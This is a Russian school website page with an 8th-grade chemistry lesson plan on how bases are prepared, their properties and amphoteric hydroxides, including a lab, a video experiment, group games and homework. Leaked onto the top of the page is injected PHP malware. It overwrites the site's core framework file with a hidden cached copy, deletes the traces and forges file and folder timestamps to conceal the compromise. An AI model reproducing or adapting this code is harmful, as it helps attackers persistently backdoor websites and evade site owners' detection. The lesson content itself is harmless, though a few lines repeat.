$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Технологическая карта урока по химии в 8 классе по теме «Получение и химические свойства оснований. Амфотерные гидроксиды»

Сайт Сагарчинской средней школы

Будущее начинается здесь и сейчас!

ВХОД



Календарь



Опрос

Интересно ли Вам на этом сайте?
 

Статистика

Пользователи : 6
Статьи : 290
Просмотры материалов : 209702

На сайте

Сейчас 5 гостей онлайн

Вход в электронный дневник

Баннер

Вход в систему "Госуслуги"

Баннер

Персональные данные Дети

Баннер

Технологическая карта урока по химии в 8 классе по теме «Получение и химические свойства оснований. Амфотерные гидроксиды»

 

 

Технологическая карта урока по химии в 8 классе

по теме «Получение и химические свойства оснований. Амфотерные гидроксиды»,  

УМК Н. Е. Кузнецова.

Цель урока: Изучить химические свойства и способы получения оснований; формировать понятие об амфотерных гидроксидах

 Целевые ориентации урока

  • Предметные: Знание реакции щелочей с кислотными оксидами , кислотам, солями, методов получения щелочей; знание химических свойств нерастворимых, а также амфотерных гидроксидов
  • Метапредметные:
  • Умение самостоятельно определять цели своего обучения, ставить и формулировать для себя новые задачи в учёбе и познавательной деятельности, развивать мотивы и интересы своей познавательной деятельности
  • универсальные учебные действия ( УУД):
  • Личностные  умения:  Формирование ответственного отношения к учёбе, готовности и способности к саморазвитию и самообразованию на основе м
  • познавательные: 
  • общеучебные - владеть приемами работы с информацией: осуществлять поиск, отбор источников необходимой информации и ее систематизацию; формулировать проблему; организовывать свою учебную деятельность; участвовать в групповой работе ( малая группа ,класс );
  • логические-осуществлять поиск существенной информации ( по материалам учебника, творческой тетради, по воспроизведению в памяти примеров из личного практического опыта), дополняющей и расширяющей имеющиеся представления о биологических объектах;
  • коммуникативные: строить понятное монологическое высказывание, обмениваться мнениями в паре, активно слушать одноклассников и понимать их позицию, находить ответы на вопросы, формулировать их; взаимодействие- строить сообщения  в соответствие с учебной задачей, адекватно использовать речевые средства для дискуссии и аргументации своей позиции;

Личностные:

  Формирование ответственного отношения к учёбе , готовности и способности к саморазвитию и самообразованию на основе мотивации к обучению и     познанию

регулятивные : принимать учебную задачу; адекватно воспринимать информацию учителя; планировать деятельность под руководством  учителя; составлять план ответа;

Методы обучения: Изучение нового материала осуществляется на основе демонстрационного и лабораторного эксперимента. Выполнение индивидуальных заданий ,в группах , тестирование позволяет закрепить полученные знания

Тип урока _ комбинированный

  Формы обучения: урок изучения нового материала на основе проблемного подхода

Средства обученияпричинно-следственные связи, внутри- и межпредметные связи

Оборудование: Пробирки, чашка Петри, пинцет

Реактивы раствор щелочи ( NaOH),индикаторы: лакмус,, фенолфталеин)

Ход урока

Этап урока, решение методической задачи

Деятельность учителя

Деятельность ученика

1.Степень усвоения материала по теме (10 мин.)
Метод .задачи:
- актуализация опорных знаний;
-  расширение мотивационного поля при изучении химии

Организационный момент

Здравствуйте! 

В этот час позвольте пожелать

Вам к познанью нового стремиться.

Наш девиз: «Бороться и искать!»

И еще: «Найти и не сдаваться!»

Ребята, давайте проверим вашу готовность к уроку. Нам сегодня понадобится:

Учебник, тетрадь, опорный конспект, таблица растворимости и ПСХЭ Д.И. Менделеева, ручка, простой карандаш.

Ребята прежде, чем назвать задачу нашего урока

Проведём разминку на знания химических формул неорганических классов

Задание на слайде- фронтальный опрос. По названному неорганическому классу кислоты мы поговорим о химических свойствах  кислот, которые заданы вам были на дом

Настрой на рабочий лад. Доброжелательный микроклимат

Готовят все принадлежности к уроку.

Индивидуальная работа в рабочих тетрадях. (взаимопроверка)

Работа у доски с комментарием ответа, консультация ответа на затруднения записи реакции от учащихся из класса

2.Постановка
   цели данного
урока

3 мин


3 мин
 Метод.задачи:
- умение работать с дополнительной информацией,
- развивать интерес к предмету, эрудицию, умение быстро и чётко формулировать и высказывать свои мысли, логически рассуждать

Что общего в формулах всех этих веществ? (сочетание -OH)  

А в чем разница между этими веществами? (в них разные металлы)

А еще в чем разница?(разные цифры стоят после гидроксогруппы Обратите внимание, на слайде написаны формулы некоторых веществ.

А в чем разница между этими веществами? (в них разные металлы)

А еще в чем разница?(разные цифры стоят после гидроксогруппы Обратите внимание, на слайде написаны формулы некоторых веществ.

- Ca(OH)2         KOH            Cu(OH)2           Al(OH)3         NaOH           Ba(OH)2

Итак, мы знаем об этом неорганическом классе многое, а какие ещё свойства характерны для этого класса 

Устное описание физических свойств оснований их классификацию номенклатуру.

Какие основания называются однокислотные? (в формулах которых указан 1 гидроксид – ион )

Какие основания называются многокислотные? (в формулах которых указаны несколько гидроксид – ионов )

Обратите внимание на слайд. Распределите основания на много и однокислотные (Закрепление)

Вторая классификация по растворимости в воде, по этому признаку все основания подразделяют на: растворимые (щелочи) и нерастворимые. К щелочам относят гидроксиды металлов IА и некоторых металлов IIА, остальные  к нерастворимым.

(Работа с таблицей растворимости). Находим в графе ионы металла  например ион К+ и гидроксид-ион, найдем место их пересечения. Какая буква там написана? (Р) Что обозначает эта буква? (растворимые). А гидроксид цинка ? (Н , значит нерастворимый).

Комментируют сходство и разницу между формулами оснований

Учащиеся называют химические свойства, получение оснований

3.Изучение 
нового материала.
Экспериментальная работа в группах
(5 + 3 мин. проверка)

Задачи:
-умение применять свои знания в лабораторной практике;
-стимулировать познавательную активность ребят; развивать интерес к предмету, эрудицию, умение быстро и чётко формулировать и высказывать свои мысли, логически рассуждать, 
- формировать коммуникативную компетенцию учащихся (умение работать в группах),
-    воспитывать ответственность за коллективный результат.

Для этого проведем лабораторную работу, как получают щёлочи, выясним как реагируют на лакмус и фенолфталеин,  с какими веществами взаимодействуют соли и что при этом получается?
На столе у каждой команды имеется набор реактивов, карточки – инструкции

Видеоопыт

- получения гидроксида цинка

- химические свойства амфотерного гидроксида цинка

Физминутка  Дыхание «оживляющее нервы»: -исходное положение: стоя, руки опущены; -сделайте полный вдох; -задержите дыхание; -сожмите руки в кулаки; -медленно поднимите руки через стороны вверх; оставайтесь в этом положении пока хватит воздуха; -медленно выдыхая, опустите руки;

-сделайте очищающие дыхание.

Запись в тетради темы урока Инструктаж по ТБ.
Согласно карточке – инструкции экспериментально определяют получение щёлочи и их реакция на индикаторы. В тетрадях записывают признаки и уравнения реакций.
Первые из правильно выполнивших задание,  пишут на доске уравнения реакций и делают вывод (под запись в рабочих тетрадях в виде схем).

Просмотр видеоопыта

Сравнивают получение и свойства NaOH. Zn(OH)2

Уравнение реакции записывают в тетрадь

Выполнение упражнений

Закрепление новых знаний.
Работа 
в группах
«Кто быстрее»
Задание №1
№5 – 116
( 5 минут)
Метод. Задачи:
- формировать коммуникативную компетенцию учащихся (умение работать в группах),
-    воспитывать ответственность за коллективный результат.
-стимулировать познавательную активность ребят;
-расширение мотивационного поля при изучении химии
Задание №2
( 5 минут)
Метод.задачи:
-стимулировать познавательную активность ребят;
-расширение мотивационного поля при изучении химии
- формировать коммуникативную компетенцию учащихся (умение работать в группах),
-воспитывать ответственность за коллективный результат.
Задание №3 
(4 минуты)
Метод. задачи:
 -умение применять свои знания в лабораторной практике; 
 -формировать коммуникативную компетенцию учащихся (умение работать в группах),
-воспитывать ответственность за коллективный результат.

Подбор заданий.

Задание в группах1,2,3

Задание «Крестики- нолики»
Группа, которая выполнит задание раньше всех, получает право ответа у доски и набирает 4 балла, те, кто верно выполнил – 2 балла, кто допустил ошибки – 0 баллов.

Задание Химическое лото

позволит вам добрать недостающие баллы
а) Что интересного вы знаете об основаниях
б) Укажите источники информации.

Учитель выставляет оценки

Выполняют задания по карточкам и задачнику. Ответы записывают на ватмане, прикрепляют на магниты к доске.

За верно выполненные задания учащиеся получают «химоны» - кружочки

Приготовленные дома сообщения о значении оснований для человека и в природеучащиеся представляют классу
Источники информации записывают на ватмане и прикрепляют магнитом к доске.
Сравнивают и оценивают результаты всех команд.

Итоги урока
(2 минуты)

Подобрать синквеин по изученной теме

Домашнее
задание

Задачник по химии 8 класс. Н.Е.Кузнецова, А.Н.Лёвкин.
1)  обязательно №5-117 
2) творческое задание 1учащихся (подготовить презентацию) по теме

«Значение оснований в жизни человека и в природе»

3) творческое задание 1учащихся  - составить кроссворд «Основание»,